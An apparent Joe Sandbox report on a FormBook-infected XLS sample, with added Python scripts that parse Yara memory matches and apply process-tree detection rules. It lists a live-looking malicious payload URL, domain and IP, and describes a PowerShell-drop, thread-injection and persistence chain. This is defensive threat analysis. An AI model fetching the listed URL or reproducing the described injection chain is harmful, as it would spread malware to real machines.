Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
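The Yara match sources above are memory-dump identifiers, and decoding them tells you which process and which memory region the FormBook signature actually hit. The following parser is an added example by the editor, not part of the Joe Sandbox report. The field layout is inferred from the page itself: in the .sdmp names the first field is the PID in hex and the fourth is the region base address (0000001E and 0000000000400000 line up with "30.2.oftmhayq.exe.400000.0.unpack"), and the second field matches the ".2." in the .unpack names. Reading the fifth field as a Windows PAGE_* protection value is an assumption; the constant values themselves are from winnt.h. The third and sixth fields are treated as opaque.

```python
"""Decode Joe Sandbox Yara match sources into per-process memory regions.

Added example by the editor; not part of the report. Field semantics for
the .sdmp names are inferred from the page (PID, dump pass, base address)
except the protection field, which is an assumption (see lead-in).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Memory protection constants from winnt.h.
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# <pid hex>.<pass hex>.<opaque>.<base hex>.<protection hex, assumed>.<opaque>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$",
    re.IGNORECASE,
)
# <pid>.<pass>.<image>.<base hex>.<index>[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-F]+)\.(\d+)(\.raw)?\.unpack$", re.IGNORECASE)


@dataclass(frozen=True)
class MemoryHit:
    pid: int
    dump_pass: int
    base: int
    protect: Optional[int]  # None for .unpack names, which carry no protection field
    image: Optional[str]    # only the .unpack names carry the process image name
    kind: str               # MEMORY or UNPACKEDPE, as in the report


def parse_source(name: str) -> MemoryHit:
    m = SDMP_RE.match(name)
    if m:
        return MemoryHit(int(m[1], 16), int(m[2], 16), int(m[4], 16), int(m[5], 16), None, "MEMORY")
    m = UNPACK_RE.match(name)
    if m:
        return MemoryHit(int(m[1]), int(m[2]), int(m[4], 16), None, m[3], "UNPACKEDPE")
    raise ValueError(f"unrecognised source name: {name}")


def summarize(names: List[str]) -> Dict[int, dict]:
    """Group hits by PID: image name (if any .unpack name gave it) and (base, protection) regions."""
    per_pid: Dict[int, dict] = {}
    for n in names:
        hit = parse_source(n)
        entry = per_pid.setdefault(hit.pid, {"image": None, "regions": set()})
        if hit.image:
            entry["image"] = hit.image
        if hit.protect is not None:
            entry["regions"].add((hit.base, PAGE_PROTECTION.get(hit.protect, hex(hit.protect))))
    return per_pid


def executable_regions(names: List[str]) -> Set[Tuple[int, int]]:
    """(pid, base) pairs whose dump came from executable memory, i.e. code that could run."""
    return {(h.pid, h.base) for h in map(parse_source, names)
            if h.protect is not None and h.protect in (0x20, 0x40)}


# The eleven source names listed in this report section.
PAGE_SOURCES = [
    "0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp",
    "0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp",
    "00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp",
    "00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp",
    "0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp",
    "0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp",
    "00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp",
    "30.2.oftmhayq.exe.400000.0.unpack",
    "29.2.oftmhayq.exe.400000.0.unpack",
    "30.2.oftmhayq.exe.400000.0.raw.unpack",
    "29.2.oftmhayq.exe.400000.0.raw.unpack",
]

if __name__ == "__main__":
    for pid, info in sorted(summarize(PAGE_SOURCES).items()):
        regions = ", ".join(f"0x{b:X} {p}" for b, p in sorted(info["regions"]))
        print(f"pid {pid:<3d} {info['image'] or '?':14s} {regions}")
```

Run against the list above, the decode shows that PIDs 29 and 30 (both oftmhayq.exe) carry the signature at 0x400000 and at a second region, in memory that (under the protection assumption) is execute-read-write, which is what a self-unpacked PE image looks like; PIDs 24, 25 and 32 only match in read-write regions and no .unpack name gives their image, so the report section alone does not say what those processes are.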

Behavior Graph

Graph ID: 323692, Sample: 5901777.xls, Startdate: 27/11/2020, Architecture: WINDOWS, Score: 100

Signatures on the root node: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 12 other signatures.

Process tree (node numbers are the graph's own identifiers, not PIDs):

  2  root
  +-- 9  powershell.exe (started)
  |     contacts sparepartiran.com, 162.223.88.131, ports 49743, 49744, 80 (COLOUPUS, United States)
  |     drops C:\Users\Public\oftmhayq.exe (PE32)
  |     signatures: Drops PE files to the user root directory; Powershell drops PE file
  |     +-- 18 oftmhayq.exe (started)
  |     |     signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements
  |     |     +-- 30 oftmhayq.exe (started)
  |     |           signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection)
  |     +-- 21 conhost.exe (started)
  +-- 14 powershell.exe (started)
  |     +-- 23 oftmhayq.exe (started)
  |     |     drops C:\Users\user\AppData\Roaming\...\vlc.exe (PE32)
  |     |     signature: Injects a PE file into a foreign processes
  |     |     +-- 33 oftmhayq.exe (started)
  |     |           +-- 35 explorer.exe (injected)
  |     |                 +-- 37 vlc.exe (started)
  |     +-- 26 conhost.exe (started)
  +-- 16 EXCEL.EXE (started)
        +-- 28 splwow64.exe (started)

Note that both powershell.exe processes hang off the root node rather than off EXCEL.EXE: the graph records no Office parent for them.
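The process tree in the behavior graph is the kind of evidence endpoint telemetry would record as process-creation events, so it is worth checking which simple detection rules would have fired on it. The script below is an added example by the editor, not part of the Joe Sandbox report; the ProcEvent shape, the rule names, the sample events and their PIDs are assumptions modelled on the graph (the graph's node numbers are identifiers, not PIDs, and the Office and PowerShell image paths are assumed). It shows one thing the graph alone does not make obvious: because no Office parent is recorded for powershell.exe, an "Office spawns script host" rule finds nothing, while the path-based rule (executables under C:\Users\Public and under the Start Menu folder) and the self-spawn rule (oftmhayq.exe launching a fresh copy of itself before the explorer.exe injection) both fire.

```python
"""Triage checks over process-creation events modelled on the report's graph.

Added example by the editor; not part of the Joe Sandbox report. Event
shape, rule names, sample events and PIDs are assumptions for illustration.
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Browsers legitimately relaunch their own image for renderer processes.
SELF_SPAWN_ALLOW = {"chrome.exe", "msedge.exe", "firefox.exe"}
# User-writable folders an installer would not normally place an executable in.
SUSPICIOUS_DIRS = (
    "c:\\users\\public\\",
    "\\appdata\\roaming\\microsoft\\windows\\start menu\\",
    "\\appdata\\local\\temp\\",
)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str  # full path of the new process image


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def in_suspicious_dir(path: str) -> bool:
    p = path.lower()
    return any(d in p for d in SUSPICIOUS_DIRS)


def triage(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule, pid, detail) findings for every event that trips a rule."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[str, int, str]] = []
    for e in events:
        parent: Optional[ProcEvent] = by_pid.get(e.ppid)
        name = image_name(e.image)
        pname = image_name(parent.image) if parent else None
        # Rule 1: an Office application directly spawning a script host.
        if pname in OFFICE_APPS and name in SCRIPT_HOSTS:
            findings.append(("office_spawns_script_host", e.pid, f"{pname} -> {name}"))
        # Rule 2: an executable started from a user-writable, non-program folder.
        if name.endswith(".exe") and in_suspicious_dir(e.image):
            findings.append(("exe_in_suspicious_folder", e.pid, e.image))
        # Rule 3: a process launching a fresh copy of its own image, the pattern
        # a loader leaves when it hollows a child of itself before injecting elsewhere.
        if pname == name and name not in SELF_SPAWN_ALLOW:
            findings.append(("parent_spawns_same_image", e.pid, f"{pname} -> {name}"))
    return findings


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Image names from the given process up to the first parent not in the event set."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


# Constructed events modelled on the report's behavior graph. PIDs are invented.
SAMPLE_EVENTS = [
    ProcEvent(2000, 1, "C:\\Windows\\explorer.exe"),
    ProcEvent(4000, 2000, "C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE"),
    ProcEvent(4100, 4000, "C:\\Windows\\splwow64.exe"),
    # The graph records no Office parent for the two PowerShell processes,
    # so their parent PID is one that is absent from this event set.
    ProcEvent(5100, 600, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    ProcEvent(5200, 600, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    ProcEvent(5300, 5100, "C:\\Users\\Public\\oftmhayq.exe"),
    ProcEvent(5310, 5100, "C:\\Windows\\System32\\conhost.exe"),
    ProcEvent(5400, 5200, "C:\\Users\\Public\\oftmhayq.exe"),
    ProcEvent(5410, 5200, "C:\\Windows\\System32\\conhost.exe"),
    ProcEvent(5500, 5300, "C:\\Users\\Public\\oftmhayq.exe"),
    ProcEvent(5600, 5400, "C:\\Users\\Public\\oftmhayq.exe"),
    # vlc.exe is started by the injected explorer.exe, so explorer is its parent.
    ProcEvent(5700, 2000, "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\VideoLAN\\vlc.exe"),
]

if __name__ == "__main__":
    for rule, pid, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:26s} pid={pid:<5d} {detail}")
    print(" <- ".join(ancestry(SAMPLE_EVENTS, 5700)))
```

The caveat this makes concrete: parent/child rules are only as good as the parentage the sensor records, and a child launched through an intermediary that does not appear in the tree (as the two powershell.exe processes are here) escapes them entirely. Path-based and self-spawn rules do not depend on the parent and still catch the dropped loader and the persisted vlc.exe.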

Contacted Public IPs

IP              Domain   Country        ASN    ASN Name  Malicious
162.223.88.131  unknown  United States  19084  COLOUPUS  true

Contacted Domains

Name               IP              Active
sparepartiran.com  162.223.88.131  true

Contacted URLs

Name                                            Malicious  Antivirus Detection    Reputation
http://sparepartiran.com/js/2Q/5901777.pdf.exe  true       Avira URL Cloud: safe  unknown

The payload URL uses a double extension (.pdf.exe) and was rated safe by Avira URL Cloud at analysis time despite the sandbox verdict; URL reputation feeds lag freshly staged payloads, so the domain and IP above should be treated as indicators on the strength of the observed download and drop, not the reputation column.